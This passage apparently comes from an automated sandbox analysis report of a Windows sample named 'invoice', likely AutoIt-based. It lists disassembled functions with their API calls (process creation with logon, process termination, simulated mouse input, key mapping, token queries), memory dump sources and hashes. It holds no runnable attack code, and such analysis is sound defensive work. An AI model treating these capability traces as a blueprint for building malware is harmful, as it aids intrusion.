                        • Instruction Fuzzy Hash: EE516631208200AFE716EB64CC85EAFBBE9FF88754F04891DF585872A1DB35E904DB52
                        Function 01005802 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenu.USER32(?), ref: 01005864
                        • GetMenuItemCount.USER32(00000000), ref: 0100589B
                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 010058C3
                        • GetMenuItemID.USER32(?,?), ref: 01005932
                        • GetSubMenu.USER32(?,?), ref: 01005940
                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 01005991
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Menu$Item$CountMessagePostString
                        • String ID:
                        • API String ID: 650687236-0
                        • Opcode ID: fcf851bb5046156b98444ba6d14b231d08d5cb6fe61aaaf243862b7eeffaf929
                        • Instruction ID: 1d87c8f38af7b8073c3dcbb06f1856a1d3a71a4e8e9f5c2fc5ae7669fb082d36
                        • Opcode Fuzzy Hash: fcf851bb5046156b98444ba6d14b231d08d5cb6fe61aaaf243862b7eeffaf929
                        • Instruction Fuzzy Hash: 9951A231A00215AFDF12EFA4CC45AAEB7B4EF49320F144099E985BB391CB75AE01DF91
                        Function 00FDF1FE Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00FDF218
                        • VariantClear.OLEAUT32(00000013), ref: 00FDF28A
                        • VariantClear.OLEAUT32(00000000), ref: 00FDF2E5
                        • _memmove.LIBCMT ref: 00FDF30F
                        • VariantClear.OLEAUT32(?), ref: 00FDF35C
                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FDF38A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Variant$Clear$ChangeInitType_memmove
                        • String ID:
                        • API String ID: 1101466143-0
                        • Opcode ID: 3f666b0a59ee56c536b263f54e79630470b2e07f22d4cb59df92c88619e47230
                        • Instruction ID: 83d59ecf6ed81363f9f02fbc5380be1a23234dde5c71550484f97bbc3ff793ed
                        • Opcode Fuzzy Hash: 3f666b0a59ee56c536b263f54e79630470b2e07f22d4cb59df92c88619e47230
                        • Instruction Fuzzy Hash: B3514DB5A002099FCB14CF58C884EAAB7B9FF4C314F19856AED59DB305D734E915CBA0
                        Function 00FE2502 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00FE2550
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FE259B
                        • IsMenu.USER32(00000000), ref: 00FE25BB
                        • CreatePopupMenu.USER32 ref: 00FE25EF
                        • GetMenuItemCount.USER32(000000FF), ref: 00FE264D
                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00FE267E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                        • String ID:
                        • API String ID: 3311875123-0
                        • Opcode ID: 019e091c88d8f586e33d039f83ba587a45971a8bb11d2471037e38454b441f9f
                        • Instruction ID: 8e053af5976793655c4ecf31d7637adac01d1134ffbdafb23960183ee207a663
                        • Opcode Fuzzy Hash: 019e091c88d8f586e33d039f83ba587a45971a8bb11d2471037e38454b441f9f
                        • Instruction Fuzzy Hash: 7551C170A01385DFCF61CF69D988BADBBF8BF44324F144259E85197290FB719904EB51
                        Function 00F81765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00F8179A
                        • GetWindowRect.USER32(?,?), ref: 00F817FE
                        • ScreenToClient.USER32(?,?), ref: 00F8181B
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F8182C
                        • EndPaint.USER32(?,?), ref: 00F81876
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                        • String ID:
                        • API String ID: 1827037458-0
                        • Opcode ID: a029baa139f9d46276243aa2fed260ff51d93098b0f6e23b9ca39347c6f2cf87
                        • Instruction ID: 4374f3df59db745cc4dd5705f74da94a2e2fc505bdd25af74c6579fda941057c
                        • Opcode Fuzzy Hash: a029baa139f9d46276243aa2fed260ff51d93098b0f6e23b9ca39347c6f2cf87
                        • Instruction Fuzzy Hash: 0441BE71504301AFD721EF25CC85FFA7BE8FB49324F140229FAA48A1A1CB759846EB61
                        Function 0100B6D2 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                        Download Yara Rule
                        APIs
                        • ShowWindow.USER32(010457B0,00000000,01505478,?,?,010457B0,?,0100B5DC,?,?), ref: 0100B746
                        • EnableWindow.USER32(00000000,00000000), ref: 0100B76A
                        • ShowWindow.USER32(010457B0,00000000,01505478,?,?,010457B0,?,0100B5DC,?,?), ref: 0100B7CA
                        • ShowWindow.USER32(00000000,00000004,?,0100B5DC,?,?), ref: 0100B7DC
                        • EnableWindow.USER32(00000000,00000001), ref: 0100B800
                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0100B823
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$Show$Enable$MessageSend
                        • String ID:
                        • API String ID: 642888154-0
                        • Opcode ID: 770adce1846c5635300755deb9c75107cd872a55a7981c2df89913d44ab34ea6
                        • Instruction ID: f47e3fb0e61f066e383cb5402e60efdb73b6254b86c34c0aa86ff10a06283bbd
                        • Opcode Fuzzy Hash: 770adce1846c5635300755deb9c75107cd872a55a7981c2df89913d44ab34ea6
                        • Instruction Fuzzy Hash: 36414F38644145EFEB63DF28C489B947FE1BB05314F1841E9EA8D8F2A2CB31A456DB51
                        Function 00FF71B3 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00FF4F57,?,?,00000000,00000001), ref: 00FF71C1
                          • Part of subcall function 00FF3AB6: GetWindowRect.USER32(?,?), ref: 00FF3AC9
                        • GetDesktopWindow.USER32 ref: 00FF71EB
                        • GetWindowRect.USER32(00000000), ref: 00FF71F2
                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00FF7224
                          • Part of subcall function 00FE52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE5363
                        • GetCursorPos.USER32(?), ref: 00FF7250
                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00FF72AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                        • String ID:
                        • API String ID: 4137160315-0
                        • Opcode ID: ab219d26da730c6c514d6ca9485c9214a041b90c444120fe0818bfb72aa9f906
                        • Instruction ID: 7685e2ba4435d3a6173cf666cd8c937eea02ab2c4a05948bf2e4fc25281e3518
                        • Opcode Fuzzy Hash: ab219d26da730c6c514d6ca9485c9214a041b90c444120fe0818bfb72aa9f906
                        • Instruction Fuzzy Hash: E031C67250930AAFD720EF15CC49B5BB7E9FF88314F00091AF68597191CB75E909DB92
                        Function 00FD8B3B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FD83D1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FD83E8
                          • Part of subcall function 00FD83D1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FD83F2
                          • Part of subcall function 00FD83D1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FD8401
                          • Part of subcall function 00FD83D1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FD8408
                          • Part of subcall function 00FD83D1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FD841E
                        • GetLengthSid.ADVAPI32(?,00000000,00FD8757), ref: 00FD8B8C
                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FD8B98
                        • HeapAlloc.KERNEL32(00000000), ref: 00FD8B9F
                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00FD8BB8
                        • GetProcessHeap.KERNEL32(00000000,00000000,00FD8757), ref: 00FD8BCC
                        • HeapFree.KERNEL32(00000000), ref: 00FD8BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                        • String ID:
                        • API String ID: 3008561057-0
                        • Opcode ID: 86d634eba32655ac63e41cecf89dff0e8e5a84a95c25d7099610eda190d59fc8
                        • Instruction ID: d193d413c72511ebff355cebd552ad13065a1a777d8d3a9409d0705b1a461440
                        • Opcode Fuzzy Hash: 86d634eba32655ac63e41cecf89dff0e8e5a84a95c25d7099610eda190d59fc8
                        • Instruction Fuzzy Hash: DA11B1B1901205FFDB21DFA4CC09FAF77BAEB85365F18401AF88597240CB369901EB60
                        Function 00FD88D9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FD890A
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00FD8911
                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FD8920
                        • CloseHandle.KERNEL32(00000004), ref: 00FD892B
                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FD895A
                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00FD896E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                        • String ID:
                        • API String ID: 1413079979-0
                        • Opcode ID: d97a005f6ad532a436b14217234d91acfc810a8e544dbc1c6da581471f7e1580
                        • Instruction ID: 425f2e49ad28b46128a7f53fbd1be70091e8ae215991b5e39e7b2e80f95a098a
                        • Opcode Fuzzy Hash: d97a005f6ad532a436b14217234d91acfc810a8e544dbc1c6da581471f7e1580
                        • Instruction Fuzzy Hash: 03118C7250020AABDF22CFA4DC09FEE7BA9FF08758F084115FE44A2150C7768D61BB62
                        Function 00FDBA52 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                        Download Yara Rule
                        APIs
                        • GetDC.USER32(00000000), ref: 00FDBA77
                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FDBA88
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FDBA8F
                        • ReleaseDC.USER32(00000000,00000000), ref: 00FDBA97
                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FDBAAE
                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00FDBAC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CapsDevice$Release
                        • String ID:
                        • API String ID: 1035833867-0
                        • Opcode ID: 75e9052521dac28db73bd8296ade266fbd22c99ccb9ac89725b4a0368b08221f
                        • Instruction ID: ea0d5fe3f7ceaf0b2fcccf6b230c5e7f09c5e08b1463cf83bad57124f8efff4b
                        • Opcode Fuzzy Hash: 75e9052521dac28db73bd8296ade266fbd22c99ccb9ac89725b4a0368b08221f
                        • Instruction Fuzzy Hash: 2301D471E00709BBEB209FB59C45A4EBFB8EB48721F004066FE04A7380DA358C00DF90
                        Function 00FA02E2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FA0313
                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FA031B
                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FA0326
                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FA0331
                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FA0339
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FA0341
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Virtual
                        • String ID:
                        • API String ID: 4278518827-0
                        • Opcode ID: c2e2a8e205a596f1f0629439e6e323dd62fee0066efa869ad00b16e27ad306b0
                        • Instruction ID: b6e77dd55adf3cbc40442f8eb72ecb0c1450f09a3a826d779fecce4f4c8c6ae8
                        • Opcode Fuzzy Hash: c2e2a8e205a596f1f0629439e6e323dd62fee0066efa869ad00b16e27ad306b0
                        • Instruction Fuzzy Hash: 9D016CB090175A7DE3008F6A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                        Function 00FE5490 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FE54A0
                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FE54B6
                        • GetWindowThreadProcessId.USER32(?,?), ref: 00FE54C5
                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FE54D4
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FE54DE
                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FE54E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                        • String ID:
                        • API String ID: 839392675-0
                        • Opcode ID: 7689ff38643b3cee7d7c1139e7cb1b0dd0c3d91196acb42aae48f7476c49c7cc
                        • Instruction ID: 6ec5ea9ae9b02437749d775feba7fa1967e95fa7094bb589e4dea11b597bf365
                        • Opcode Fuzzy Hash: 7689ff38643b3cee7d7c1139e7cb1b0dd0c3d91196acb42aae48f7476c49c7cc
                        • Instruction Fuzzy Hash: 9DF01231541559BBD7325B629C0DEEB7B7CEBCAB15F000159F944D10809AA61A0197B5
                        Function 00FE72D9 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • InterlockedExchange.KERNEL32(?,?), ref: 00FE72EC
                        • EnterCriticalSection.KERNEL32(?,?,00F91044,?,?), ref: 00FE72FD
                        • TerminateThread.KERNEL32(00000000,000001F6,?,00F91044,?,?), ref: 00FE730A
                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00F91044,?,?), ref: 00FE7317
                          • Part of subcall function 00FE6CDE: CloseHandle.KERNEL32(00000000,?,00FE7324,?,00F91044,?,?), ref: 00FE6CE8
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FE732A
                        • LeaveCriticalSection.KERNEL32(?,?,00F91044,?,?), ref: 00FE7331
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                        • String ID:
                        • API String ID: 3495660284-0
                        • Opcode ID: d75ea6610a8a189857e537b0aadfc709aef35f1f253b0cae9a79517841bf0a0d
                        • Instruction ID: 92125f3dbcb692d53998e87eee93784b33ed7b904b84d293fad1a3680b03074d
                        • Opcode Fuzzy Hash: d75ea6610a8a189857e537b0aadfc709aef35f1f253b0cae9a79517841bf0a0d
                        • Instruction Fuzzy Hash: D5F05E36544713ABE7323B64ED8C9DA772AEF49312F100521F582D1098CB7A5811EBA0
                        Function 00FD8C54 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FD8C5F
                        • UnloadUserProfile.USERENV(?,?), ref: 00FD8C6B
                        • CloseHandle.KERNEL32(?), ref: 00FD8C74
                        • CloseHandle.KERNEL32(?), ref: 00FD8C7C
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00FD8C85
                        • HeapFree.KERNEL32(00000000), ref: 00FD8C8C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                        • String ID:
                        • API String ID: 146765662-0
                        • Opcode ID: 27d89349b61a38275d016bb25bcb413a96e2e924f7186123d395bbede39bf002
                        • Instruction ID: d82eeb8144335d3076d5c397a13ba6d18da09fbbc643793b18bfac08ed8f583d
                        • Opcode Fuzzy Hash: 27d89349b61a38275d016bb25bcb413a96e2e924f7186123d395bbede39bf002
                        • Instruction Fuzzy Hash: 12E0ED36004502BBD7226FE1EC0C945BF79FF89722F108220F259C1068CB375460EB50
                        Function 00FF8702 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00FF8728
                        • CharUpperBuffW.USER32(?,?), ref: 00FF8837
                        • VariantClear.OLEAUT32(?), ref: 00FF89AF
                          • Part of subcall function 00FE760B: VariantInit.OLEAUT32(00000000), ref: 00FE764B
                          • Part of subcall function 00FE760B: VariantCopy.OLEAUT32(00000000,?), ref: 00FE7654
                          • Part of subcall function 00FE760B: VariantClear.OLEAUT32(00000000), ref: 00FE7660
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                        • API String ID: 4237274167-1221869570
                        • Opcode ID: 320ebb439afee5736be17a1102b9b0536511c5f6c67e60f80d910e3c27e13227
                        • Instruction ID: b535c7de913b2d6f0d4980368d22d28be86724ffc4cb1ef95f0e1fd7f8a25cbb
                        • Opcode Fuzzy Hash: 320ebb439afee5736be17a1102b9b0536511c5f6c67e60f80d910e3c27e13227
                        • Instruction Fuzzy Hash: 9391CD75608305DFC710EF24C88096ABBF4EF88754F14896EF98A8B361DB74E906DB52
                        Function 00FE2D8E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F9FE06: _wcscpy.LIBCMT ref: 00F9FE29
                        • _memset.LIBCMT ref: 00FE2E7F
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FE2EAE
                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FE2F61
                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FE2F8F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$Default_memset_wcscpy
